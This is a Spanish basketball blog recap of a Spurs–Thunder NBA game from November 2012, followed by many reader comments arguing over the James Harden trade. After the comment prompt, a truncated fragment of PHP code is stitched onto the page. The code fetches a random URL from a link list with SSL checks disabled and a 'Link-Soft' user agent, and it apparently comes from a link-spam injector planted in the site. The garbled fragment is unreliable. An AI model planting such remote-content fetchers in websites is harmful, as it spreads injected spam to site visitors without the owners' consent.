La Crónica: Sandy pospone el derbi neoyorquino

02 de November de 2012 por TheDeerHunter

Nos quedamos con las ganas de ver el estreno de los dos equipos de Nueva York, derbi local para más inri. A ver si tenemos más suerte este fin de semana, pues ambos equipos también juegan de local su próximo partido.

Para colmo anoche únicamente había programados dos choques. Así que la jornada se reduce exclusivamente al Thunder@Spurs.

Tony Parker en el Winner que permitió a su equipo ganar a los ThunderIntenso y emocionante duelo (84-86). No tanto por calidad, con los dos equipos todavía encontrándose a si mismos pero sí por igualdad y por ese halo de grandeza que transmiten ambos.

Tras la exhibición de Harden ayer, los Thunder no pudieron comenzar peor. No es que sea una deshonra imperdonable perder en el Álamo, pero si había alguien que lograba desatascar ciertas defensas y reducir la tendencia al “yo me lo guiso” que tienen los principales espadas del equipo ese era el barbudo nuevo jugador de los Rockets.

No fue un mal debut de Martin, que recogió el testigo de tercer mejor anotador e incluso movió bien el balón con 5 asistencias. Sin embargo fue Westbrook quién estuvo más espeso en tal faceta con 6 pérdidas por 5 asistencias, una de ellas la que finalmente supondría la derrota.

Por los Spurs lo mismo de siempre. En ausencia de Manudo, el yunque es Duncan como los buenos vinos. El martillo, el talento de Parker junto con ese crónico espíritu colectivo. Sumaron Diaw, Green, Jackson, Neal… defendieron como jabatos llevándose Leonard el mérito del robo decisivo. Para rematar hay pocos tan buenos como Parker. Desmarque, tiro abierto en la cara de Ibaka y canasta como si tal cosa. Otra victoria más al bolsillo de Popovic, pero ni por esas se le quita la cara de vinagre.

Durant lo intentó todo para doblegar a los Spurs

PREMIOS

MVP: Compartido para la pareja Duncan&Parker, el primero hizo 20 puntos, 8 rebotes y 3 tapones, por 14 puntos y 11 asistencias del base.

Rookie: Ninguno de los 3 rookies que podian jugar lo hicieron.

Sorpresa: Seguimos con parejas, esta vez Danny Green y Boris Diaw que sumaron 23 puntos, 12 rebotes y 6 asistencias. También nos sorprendió ver solo 4 minutos en pista a Splitter.

Decepción: Mal partido de Westbrook, de los que dejan a la vista sus defectos. Sus 6 pérdidas y una serie de 6 de 21 en tiros fueron una losa para los Thunder.

Esfuerzo en vano: Kevin Durant estuvo cerca de tumbar a los Spurs casi sin ayuda pero sus 23 puntos, 14 rebotes y 5 asistencias murieron en la orilla.

Imágenes | AP Photos / Getty Images

Comenta

40 comentarios a esta entrada

  1. Laker1624 dice:
    #1

    Ya he comentado sobre este partido en la crónica de la jornada anterior… Pero bueno, ya pego aquí mi comentario que creo que es donde debería ir.

    Decir que por parte de Oklahoma me quedo con Durant y poco mas. El juego interior de los Thunder me ha parecido muy pobre, y aunque pienso que por cualidades y potencial ofensivo no se debe esperar mucho de sus hombres grandes, aun deberían rendir algo mas. El partido de Westbrook tampoco lo salvo, malos porcentajes de tiro y mala dirección de juego en mi opinión. Aparte del ya mencionado Durant también me quedo con Kevin Martin, aunque no rinda al nivel de Harden creo que puede ofrecer mucho a este equipo saliendo desde el banquillo. Por parte de los Spurs decir que aunque a lo mejor es pronto para emitir veredictos los veo entre los primeros cuatro del Oeste.

    PD: Cuando veo a Duncan me parece que es un jugadorazo eterno.

      Citar

  2. Colo dice:
    #2

    Muchos partidos se deciden por los detalles, por los balones perdidos, por los aciertos de grandes jugadores. Este partido ha sido ejemplo de muchas cosas. Por ejemplo, que no es tan importante la edad como el estado del jugador. Duncan a sus 36 años parecía tener 26. Parker está en racha.

    Y por otro lado creo que la marcha de Harden resta posibilidades a Oklahoma porque Harden era un jugador muy importante en el cuadro Thunder. Me gusta Durant y considero a Westbrook un gran jugador, pero de momento los mejores momentos los he visto en los Spurs, en los Jazz y en los Rockets.

    Saludos!

    Colo
    Comentarista del canal de Youtube NBATVColo

      Citar

  3. Lanegan dice:
    #3

    Mención especial para el cortocircuito de Westbrook en la última jugada, todavía debe de estar buscando a Parker. Ahora empieza uno de los grandes debates de la temporada, ¿debería OKC haberse quedado con Harden y largado a Westbrook?

      Citar

  4. Laker1624 dice:
    #4

    De momento yo situo a los Heat un peldaño por encima del resto, luego tambien me ha gustado el trabajo de equipo mostrado por Celtics y Bulls. En el Oeste creo que Spurs y Clippers haran mucho daño, y que la sorpresa puede estar en los Warriors, que aunque no me gusto su debut a pesar de que ganaran, pienso que seran un equipo muy competitivo cuando ya esten mas rodados.

      Citar

  5. Laker1624 dice:
    #5

    Lanegan: Mención especial para el cortocircuito de Westbrook en la última jugada, todavía debe de estar buscando a Parker. Ahora empieza uno de los grandes debates de la temporada, ¿debería OKC haberse quedado con Harden y largado a Westbrook?

    Yo creo que para Oklahoma era mejor quedarse a Westbrook que a Harden. Pienso que habrían echado de menos a un jugador de su perfil si hubiese abandonado el equipo. Sin desmerecer a Harden opino que Westbrook tiene un potencial alucinante y que si no lo desaprovecha puede llegar a ser un jugador tremendo. Aunque Kevin Martin no llegue al nivel de Harden creo que puede llegar a cubrir su hueco con ciertas garantías, en caso de que Westbrook hubiese ido a otro destino dudo mucho que hubieran podido traer a alguien capaz de sustituirle.

      Citar

  6. Esteban dice:
    #6

    ya lo hemos hablado, y ahora sancho dira q soy oportunista, pero NUNCA hubiese dejado ir a HARDEN, el thunder debio renovarle, y el año proximo cuando entr en vigencia su nuevo contrato, aplicar la amnistia a perkins, y apenas estarian en el impuesto de lujo, ESTO SI YA LO HE DICHO ANTERIORMENTE, ver comentarios del analisis de la temporada del THUNDER

    una base formada por russell, harden, durant, ibaka, mas los contratos baratos de sefolosha, collison y jones, tranquilamente se podria completar con veteranos por el minimo, cualquiera sean ellos,

    sin dudas el thunder ah tomado el camino equivocado, POR QUE PASARA AHORA? creo que jeremy lamb tiene pasta de crack y puede ser una estrella de la liga, pero que sucedera si lo logra? si se transforma en alguien tan bueno como harden? NO LE RENOVARAN TAMPOCO? y si perry jones explota? tampoco podrian pagarle…

    seamos sinceros, a menos que tus estrellas resignes millones como el HEAT, es casi imposible ganar la liga con salarios bajos, sino veamos a los campeones multimillonarios lakers, bsoton y mavs, los cavs de lebron y orlando de DH12 gastando millonadas, incluso los spurs, que no pudieron ganar mas titulos por no entrar en imnpuesto de lujo
    vean lo dificil que le fue a detroit terminar de dar el salto sin superar el impuesto de lujo
    una pena que esta franquicia este en OKLAHOMA y no en SEATLE

      Citar

  7. Denise dice:
    #7

    A mi me ha gustado bastante el movimiento de los Thunder; además paradojicamente creo que es un trade en el que no hay perjudicados, a ambos les favorece.
    – Los Thunder no mantienen al mercenario barbudo que no quería renovar y que podría crear mal ambiente, y se hacen con un rookie aparentemente en condiciones, y un anotador compulsivo y experimentado que en caso de hacer una campaña desatrosa le deja un gran expiring.

    – Y los Rockets se hacen con el mercenario barbudo que motivará al aficionado y seguramente vendan más entradas y merchandising con el barbudo que con Kevin Martin. Además, le da una inyección de moral al equipo, que pasa de deshauciado a un equipo que luche por Playoffs (aunque personalmente creo que no van a entrar)

      Citar

  8. Esteban dice:
    #8

    Laker1624: Yo creo que para Oklahoma era mejor quedarse a Westbrook que a Harden. Pienso que habrían echado de menos a un jugador de su perfil si hubiese abandonado el equipo. Sin desmerecer a Harden opino que Westbrook tiene un potencial alucinante y que si no lo desaprovecha puede llegar a ser un jugador tremendo. Aunque Kevin Martin no llegue al nivel de Harden creo que puede llegar a cubrir su hueco con ciertas garantías, en caso de que Westbrook hubiese ido a otro destino dudo mucho que hubieran podido traer a alguien capaz de sustituirle.

    yo digo que los dos, por mas picks de primera ronda que se gano el city, dificilmente puedan conseguir un jugador de su nivel, si bien le podian ofrecer un año menos a harden, creo que si le hubiesen ofrecido el maximo habria aceptado

      Citar

  9. Lanegan dice:
    #9

    Hombre Denise, yo no lo llamaría mercenario, ¿lo fue Westbrook exigiendo el máximo? ¿Por qué el tenía que renunciar a dinero y no Russell, o Ibaka? Si quieres tener a un jugador de primer nivel saliendo del banquillo y aceptando ser la tercera opción en ataque le has de pagar como corresponde a su calidad y no a su rol.

      Citar

  10. Denise dice:
    #10

    es casi imposible ganar la liga con salarios bajos,

    El nuevo impuesto de lujo es una verguenza, lo que provoca es que solo los equipos de los grandes mercados puedan tener plantillas con 3-4 megacracks, les da igual el impuesto de lujo que el pongan, tienen para afrontarlo gracias al mercado donde se mueven.

    Si la NBA pretendía con esa norma la igualdad de los equipos, la ha cagado y bien. Espero que cambien la norma, si no, dentro de 5 años vamos a ver a los Lakers, Knicks, Nets, Heat, Celtics o Mavs con 4 All-Stars en su roster y plantillas de 100 millones; y a los Bobcats, Cavs, Bucks o Raptors con plantillas de medio pelo o teniendo que pujar o darle 25 kilos a un tio si quiere tener algun jugador franquicia en su equipo.

      Citar

  11. Denise dice:
    #11

    Lanegan: Hombre Denise, yo no lo llamaría mercenario, ¿lo fue Westbrook exigiendo el máximo? ¿Por qué el tenía que renunciar a dinero y no Russell, o Ibaka? Si quieres tener a un jugador de primer nivel saliendo del banquillo y aceptando ser la tercera opción en ataque le has de pagar como corresponde a su calidad y no a su rol.

    Pero según se comenta, la diferencia entre lo que le ofrecían y lo que el quería no era absimal; solo 5 millones de 60. Solo un mercenario se cambia de un equipo con aspiraciones al anillo a otro con un futuro a largo plazo bastante dudoso.
    Ojo, no lo crucifico por ser un mercenario, cada uno tiene sus apiraciones en la vida, y respeto la decisión de jugadores que anteponen el dinero a anillos, pero que no se quejen si lo llaman mercenario.

      Citar

  12. diestro dice:
    #12

    Pues a mi me pareció y me parece un movimiento muy bueno para todas las partes. Esta claro que Harden quería más dinero y más protagonismo, que por cierto, al final se traduce en mas dinero en publicidad, y eso Thunder no se lo podían dar. Han salvado la situación de una forma que a mi personalmente me parece de las mejores posibles (de hecho las que me puedan parecer mejores, supongo que a Thunder también, pero no se habrán podido hacer).

    Para mi ha sido un ejemplo de gestión, lo demás es hacerse cuentas de la lechera. Si otros managers actuaran con el mismo sentido común, mejor les iría.

    Lo bueno es que las opiniones, las hay para todos los gustos, si no … de que íbamos a hablar jeje.

    Un saludo

      Citar

  13. Laker1624 dice:
    #13

    Esteban: yo digo que los dos, por mas picks de primera ronda que se gano el city, dificilmente puedan conseguir un jugador de su nivel, si bien le podian ofrecer un año menos a harden, creo que si le hubiesen ofrecido el maximo habria aceptado

    Yo también pienso que hubiera sido mejor que se quedaran los dos, pero respondiendo al debate que ha propuesto Lanegan y si tengo que elegir creo que para los Thunder es mejor (o menos malo) perder a Harden que a Westbrook.

      Citar

  14. Esteban dice:
    #14

    por un lado lo de mercenario y la busqueda del anillo, a ver, es muy dificil que jugadores renuncien a dinero, solo conozco dos casos, LEBRON y WADE, pero vamos que ambos se pasaron su carrera cobrando el maximo y recien luego de muchos años se decidieron a resignar dinero en busqueda del anillo
    tanto westbrok como harden son demasiado jovenes como para exigirles que resignen dinero a esta altura de sus carreras
    si vemos a nash, que tiene 40 años, y aun asi, no bajo de los 9 millones, o el propio garnett en una cifra similar, vemos que no es facil resignar nada, y no me vengan con MALONE por un año de sus 20 de profesional cobro el minimo

    en cuanto al impuesto de lujo denise, es a lo que me referia, mientras el thunder escatime en entrar al impuesto de lujo, sus chances de titulo seran muy bajas, mientras no le pagan el maximo a harden, hay equipos como los nets que le pagan 12 millones a humpries, y ni hablar de lakers, boston y los mavs hasta hace dos años, la diferencia economica es demasiado grande

      Citar

  15. Esteban dice:
    #15

    Laker1624: Yo también pienso que hubiera sido mejor que se quedaran los dos, pero respondiendo al debate que ha propuesto Lanegan y si tengo que elegir creo que para los Thunder es mejor (o menos malo) perder a Harden que a Westbrook.

    es una pregunta dificil, la repsuesta deberia ser de que juega westbrook
    a ver, una base organizador y director con los jugadores que tiene el thunder no es tan dificil de conseguir, el propio calderon jugando al lado de harden y durant seria un espectaculo,
    quiero decir q quiza, encontrar un escolta del nivel de harden es mas dificl que un base que pueda cumplir una buena funcion

    ahora si convencen a westbrook que no es base sino escolta, la cosa cambia,
    en algun momento lo dije, creo que westbrook deberia agregarle unos kilos a su cuerpo y hacer la transformacion de posiciones como hicen WADE, que entro a la liga como base y termino de escolta

      Citar

  16. Esteban dice:
    #16

    sobre la amnistia a perkins y ahorrarse ese dinero, lo dije antes de la final con el HEAT y ahora copio y pego un comnetario extraido por la pagina amiga, comojuega

    Perkins es un gran Pivot en cuanto a defensa de poste bajo, pero para ser sinceros, cada vez hay menos jugadores de ese tipo, por lo que en muchas ocasiones, queda sin un rol definido en cancha (ver serie de Finales vs Heat).

    quiza la llegada de HOWARD a los lakers les hizo creer al thunder que lo necesitarian, pero a mi entender, sobra en el quinteto y esos millones debieron estar destinados a pagar parte del salario de harden

      Citar

  17. Laker1624 dice:
    #17

    Esteban: es una pregunta dificil, la repsuesta deberia ser de que juega westbrooka ver, una base organizador y director con los jugadores que tiene el thunder no es tan dificil de conseguir, el propio calderon jugando al lado de harden y durant seria un espectaculo,quiero decir q quiza, encontrar un escolta del nivel de harden es mas dificl que un base que pueda cumplir una buena funcionahora si convencen a westbrook que no es base sino escolta, la cosa cambia,en algun momento lo dije, creo que westbrook deberia agregarle unos kilos a su cuerpo y hacer la transformacion de posiciones como hicen WADE, que entro a la liga como base y termino de escolta

    Es posible que no sea tan difícil encontrar un buen base organizador y director de juego, pero si creo que es muy difícil encontrar un jugador con la polivalencia y la proyección de Westbrook en su posición. También pienso que la marcha de Harden quita mas de lo que da a los Thunder, y que hay pocos escoltas de su nivel en la liga, pero tengo confianza en el papel que puede tener Kevin Martin en este equipo.

    Si hubiera tenido que elegir entre Westbrook y Harden me hubiera quedado a Westbrook sin dudarlo.

      Citar

  18. Esteban dice:
    #18

    westbrook parece mejor que harden, por el rol q tiene en el equipo, veremos si harden con un rol trascendente como el de westbrook en el city, de titular y tirando lo que quiere (anoche mas de durant), muestra un nivel mayor

      Citar

  19. Laker1624 dice:
    #19

    Es posible que ahora Harden muestre un nivel mayor en los Rockets, de hecho pienso que sus numeros individuales deberian aumentar considerablemente, pero creo que los Thunder estaban y estan mas preparados para suplir las carencias que ha dejado la marcha de Harden, dejando de lado quien es mejor jugador.

      Citar

  20. AndiD dice:
    #20

    Denise: Pero según se comenta, la diferencia entre lo que le ofrecían y lo que el quería no era absimal; solo 5 millones de 60. Solo un mercenario se cambia de un equipo con aspiraciones al anillo a otro con un futuro a largo plazo bastante dudoso.

    Denise, luego le llamas como a ti te guste, pero Harden no se ha ido por 5 millones. OKC le podía ofrecer como máximo 4 años de contrato para un total de 60M$. Según comentan en webs americanas, OKC se plantó en 53M$.
    Y el bueno del barbudo ha firmado 80M$ por 5 años con Houston. 80-53 son más de 25M$ de diferencia… eso es mucho dinero. No estamos hablando de los 2-3M$ a los que renunciaron los 3 mosqueteros de Miami para jugar juntos.
    Además, ser la primera espada en un equipo cualquiera (menos Bobcats, jejje) da mucho más merchandising/caché que ser la tercera en un equipo campeón. OKC siempre será de Durant y algo de Westbrook, y Houston ahora es de Harden.

    A mi el trade me parece genial para todos. Harden me parece un jugador muy bueno, pero para hacer el trabajo que venía haciendo en OKC (microondas y jugar minutos con los titulares) creo que hay varios jugadores válidos, Kevin Martin entre ellos.

    Ah, Esteban, si Sancho no lo dice lo digo yo: OPORTUNISTA 🙂 Creo que es muy pronto para juzgar quién ha salido ganando en el trade. Que OKC pierda en el Álamo es algo que podía pasar con o sin Harden.

      Citar

  21. Laker1624 dice:
    #21

    También opino que Westbrook no es un director de juego puro por ahora, pero creo que tiene mucho margen de mejora en ese aspecto. La faceta anotadora creo que es su punto fuerte, y también me parece un buen reboteador para su posición. Repito que no pretendo negar las virtudes de Harden que también me parece un gran anotador y un buen jugador en el aspecto colectivo con un gran margen de mejora. Pero creo que si Westbrook hubiera abandonado Oklahoma en lugar de Harden, este hubiera pasado al quinteto titular y los Thunder habrían perdido un grandísimo revulsivo y anotador desde el banquillo, algo que pienso que mantienen (en menor medida) con Kevin Martin. Aparte de que supongo que se habrían visto en la obligación de traer otro base que aunque se tratase de un director de juego mejor que Westbrook, los Thunder habrían perdido en anotación y potencial físico, cosa que les habría perjudicado muchísimo.

      Citar

  22. nach dice:
    #22

    Esteban: del anillo, a ver, es muy dificil que jugadores renuncien a dinero, solo conozco dos casos, LEBRON y WADE,

    Duncan, Pierce, próximamente Ginobili, por citar 3 casos

      Citar

  23. Sancho88 dice:
    #23

    El problema de los Thunder con el traspaso, no es tanto la pérdida de puntos de Harden, ya que Martin ha acreditado de sobra que puede meter 20 puntos o más por noche en cualquier equipo, sino que antes las defensas se cagaban contra Westbrook-Harden-Durant porque no podían defender a los tres a la vez, era algo técnicamente imposible. De hecho, los Spurs caen cuatro partidos seguidos por Knockout y porque Popo no supo cómo pararles. Luego Miami sí, tiró de intendencia y tenían mucho más físico, juventud y kilos de músculo para parar a los tres en la final.

    Entonces, ahora para muchos equipos el scout está más fácil. Antes Westbrook lo tenía chupado, relativamente, para encontrar buenas opciones en ataque. Solo su cabeza era incapaz de hacerlo, pero no tenía problemas. Ahora, cuando quiera buscar a Durant y vea dos perros encima de él todo el partido, le va a ser más complicado, y si ya de por sí es un perdedor de balones nato, este hecho le va a dificultar aún más su escasa visión de juego.

    Lo que habéis planteado sobre el cambio de rol específico de Westbrook me parece muy interesante, y que pasase a jugar de 2 con Martin o Lamb de suplente. Eso podría ser una buena solución, pero entonces deberían hacerse cargo del contrato de José Manuel Calderón. Si consiguen al extremeño, tenemos de nuevo aspirante al título. Yo si fuera Presti iría a por él sí o sí

      Citar

  24. Laker1624 dice:
    #24

    Yo creo que a pesar de la marcha de Harden siguen siendo un serio aspirante al titulo y los veo primeros del Oeste.

      Citar

  25. gabrielj dice:
    #25

    yo lo considero un traspaso mas que digno viendo la que se le venia encima a los Thunder, una vez asumido que no tienen capacidad para hacer frente al impuesto de lujo es evidente que mas les valía pillar ahora lo que pudieran antes que perderlo en verano sin recibir nada a cambio

    dicho esto estoy deacuerdo en lo que comentáis de Westbrook como escolta si consiguen un base director, podrían explotar todas sus virtudes dejando de lado sus grandes defectos y tampoco creo que sufriera mucho el cambio en defensa

    y por acabar, si me dieran a elegir para mi equipo entre Westbrook y Harden, yo personalmente me quedaría a Harden

      Citar

  26. Laker1624 dice:
    #26

    Si tuviera que confeccionar una plantilla desde cero no se a cual de los dos elegiría, pero con la actual plantilla de los Thunder no tendría ninguna duda en quedarme con Westbrook por los motivos que ya he ido comentando anteriormente.

      Citar

  27. nba dice:
    #27

    Yo creo que en lo de Harden realmente ha pesado lo de ejercer como sexto hombre, porque al fin al cabo lo que ha querido demostrar es que tiene calidad para ser la referencia en ataque, ya veremos hasta donde llega, pero al menos ha tenido la valentia de tirarse a la piscina a ver cuanto es capaz de dar de si, aunque en OKC lo echaran de menos por su gran conocimiento y aportacion en el juego.
    Esto lo asemejo a lo que llevo comentando estos días de que en los Lakers Pau debería salir desde el banquillo para equilibrar los quintentos y rendimiento general, y algunos lo toman como una afrenta personal a Pau, nada mas lejos de la realidad, debido a la gran calidad de Pau, el hecho de compartir protagonismo con jugadores de tanta calidad, hace que sus virtudes no se han tan necesarias, en cambio se maximizan sus defectos, por el contrario si saliese con los suplentes el seria la referencia y el resto se limitarian a aportar con mayor tranquilidad al no tener la necesidad imperiosa ya que compartirian protagonismo con un crack que hace mejores a los compañeros.
    Por hacer una comparacion, no creo que nadie considere a Ginobili “suplente”, aunque salga con los suplentes y por muy “mayor” que pueda ser,sino que un entrenador como Pop ha visto que esa es la mejor solucion para que su equipo consiga las victorias.

      Citar

  28. nach dice:
    #28

    La gran cagada para ellos fue Perkins, sin duda ninguna.

    Lo de Harden fue un tema de pasta al 100%, nada de suplente ni leches. Creía que les podía sacar algo más Thunder no estaba por la labor

      Citar

  29. nba dice:
    #29

    Al menos Perkins da el pego,
    mientras en Lala-land,si estos dos se atreviesen a hacer cambios drasticos en beneficio del equipo,
    http://twitter.com/paugasol/status/264136750312615936/photo/1
    la realidad es que los Lakers serian imparablres

      Citar

  30. HisRoyalAirness dice:
    #30

    Vamos a ver, Harden quería ser jugador franquicia (porque tiene pasta para serlo) y estaba claro que alguien así no va a tolerar: 1-ser suplente siempre y 2-ya que lo es y le dicen que es simplemente algo táctico, cobrar menos que sus “iguales”.
    Además, no olvidemos lo que cobran Ibaka y Perkins, que del segundo ya ni hablo pero a Serge se le están haciendo felaciones continuamente y es simplemente un tipo con un gran físico (como hay a millones) y con una gran facilidad para taponar. Eso vale más de 10 kilos al año? Para mí claramente NO.

    Westbrook sigue con los mismos problemas de siempre, por mucho que haga numerazos no es ni será nunca un base y su IQ es bastante deplorable. Me da igual que hagas una penetración y metas canasta y saques falta, puede que tu equipo no es lo que necesite en ese momento del partido. A veces se necesita pausa, mover la bola y cansar al contrario.

    Sancho estás bebido? Has dicho que Oklahoma tiene que asumir el contrato de 8 kilos de Calderón??

    Mi bienvenida a los nuevos, por cierto! (creo que lo sois, o yo pierdo)

      Citar

  31. gabrielj dice:
    #31

    a Perkins lo ficharon para defender a Bynum en playoffs y ahora que no esta Bynum les han traído a Howard así que su función en el equipo seguiría estando “justificada” segun su criterio, otra cosa es que como se vio el año pasado Perkins es un 0 a la izquierda contra el 80% de los equipos de la liga

      Citar

  32. Ruxixón dice:
    #32

    Llegados a este punto,¿véis necesario hacerse con un anotador en la pintura?En este pasado partido,y en la mayoría de la pasada temporada se echaba en falta más anotadores que Westbrook y Durant.Estaba Harden (este año Kevin Martin) pero cuando fallaba “el barbas” había un vacio difícil de ocupar.

    Ibaka y Perkins están cortados por el mismo patrón y creo que con la renovación de Ibaka se está jugando sobre una línea muy delgada entre lo que es el jugador y lo que puede llegar a ser -jugador que anote 15 ppp,con buen tiro a media distancia- y con el tiempo puede ser un problema siempre y cuando se mantenga a los dos en el roster.Ni que decir tiene que a mí me sobran los dos a la vez sobre la cancha.Dicho esto,¿ponga un Bargnani -o algo parecido- en su vida?

      Citar

  33. melo15 dice:
    #33

    Pues yo no creo que Perkins sea un mal jugador, es verdad que su contrato es un poco excesivo pero aunqeu haga 0p y 4r aporta otras cosas. Nose si alguien vio el OCK-SAS, pero Perkins fue el mejor de los suyos, reboteando, defendiendo y incluso anotando.
    El porblema de Harden es que el cree que puede ser algo mas que un 6hombre, que tiene calidad para ser un jugador franquicia y eso en OCK no se lo iban a dar. Martin y Lamb son bueno pero ayer sin Harden, Westbrook y Durant el ataque de los Thunder se estanco mucho y creo que esa la principal desventaja, la direccion.

    A mi me habria gustado que se hubiese ido a Washington por Beal y algo mas, creo que Beal es mas completo que Lamb.

      Citar

  34. Sancho88 dice:
    #34

    Pues si, Calde les vendría de perlas a estos tipos. Si siempre se piensa en la pasta, entonces dejamos de hablar directamente de baloncesto, o yo por lo menos paso. Estamos hablando acerca del rol de Westbrook. No es director, y si podría ajustarse al puesto de dos, y es ahí donde yo digo lo de Calde. Hay jugadores mucho peores que él cobrando más, no me parece ninguna chaladura pensarlo

      Citar

  35. Esteban dice:
    #35

    nach: Duncan, Pierce, próximamente Ginobili, por citar 3 casos

    duncan nunca se bajo el sueldo, salvo este año que con 36 años, pierce no cobra el maximo, pero no ha resignado mucho, ginobili cobrara lo que debe cobrar, nunca merecio el maximo

      Citar

  36. Esteban dice:
    #36

    AndiD: Denise, luego le llamas como a ti te guste, pero Harden no se ha ido por 5 millones. OKC le podía ofrecer como máximo 4 años de contrato para un total de 60M$. Según comentan en webs americanas, OKC se plantó en 53M$.
    Y el bueno del barbudo ha firmado 80M$ por 5 años con Houston. 80-53 son más de 25M$ de diferencia… eso es mucho dinero. No estamos hablando de los 2-3M$ a los que renunciaron los 3 mosqueteros de Miami para jugar juntos.
    Además, ser la primera espada en un equipo cualquiera (menos Bobcats, jejje) da mucho más merchandising/caché que ser la tercera en un equipo campeón. OKC siempre será de Durant y algo de Westbrook, y Houston ahora es de Harden.

    A mi el trade me parece genial para todos. Harden me parece un jugador muy bueno, pero para hacer el trabajo que venía haciendo en OKC (microondas y jugar minutos con los titulares) creo que hay varios jugadores válidos, Kevin Martin entre ellos.

    Ah, Esteban, si Sancho no lo dice lo digo yo: OPORTUNISTA Creo que es muy pronto para juzgar quién ha salido ganando en el trade. Que OKC pierda en el Álamo es algo que podía pasar con o sin Harden.

    no es de oportunista, lo comente en el analisis del thunder a fin de temporada, cuando se dudaba si se renovaria a harden, y se creia que si, asi q de oportunista 0 colega

      Citar

  37. Sebastian dice:
    #37

    Yo no creo que sea ni un traspaso positivo ni un traspaso negativo, era lo que mejor a lo que podían aspirar los dos equipos.
    Coincido que Perkins a pesar de ser menos que nulo en ataque aporta muchas cosas en defensa, pero el problema que contra los equipos sin un pivot referencia en ataque esas cosas no sirven, como bien dijeron el 80% de los equipos.
    El día que Durant pueda jugar de 4, Oklahoma se asegura llegar a todas las finales, o el día que westbrook empiece a razonar(veo más factible la primera). Ya que por altura podría jugar tranquilamente, rebotea bien, y con su velocidad ningun ala-pivot podría defenderlo en cuanto se aleje del aro. Y cerca del aro ningún alero puede hacerle frente si aprende 2 o 3 movimientos básicos.

      Citar

  38. Esteban dice:
    #38

    Sebastian, la posibilidad de durant de 4 ah sido siempre poco valorada, quiza porq en defernsa se cargaria de faltas rapidamente, pero seria una buena forma de enfrentar al heat, mas si LAMB puede transformarse en un titular de este equipo en un lapso breve

      Citar

  39. Sebastian dice:
    #39

    Sefolosha podría jugar de 3 o probar también con Perry Jones

      Citar

  40. HisRoyalAirness dice:
    #40

    Sancho, Calderón distribuye bien, ahí de acuerdo.
    Pero su defensa? Es que es lamentable, no hay por dónde cogerla

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>